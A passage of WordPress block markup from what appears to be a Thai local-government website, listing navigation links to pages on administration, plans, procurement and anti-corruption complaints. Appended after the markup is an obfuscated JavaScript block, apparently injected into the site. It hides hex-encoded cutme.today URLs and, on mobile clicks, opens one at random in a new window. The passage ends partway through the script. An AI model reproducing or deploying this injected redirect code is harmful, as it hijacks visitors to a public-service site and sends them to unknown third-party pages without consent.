class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 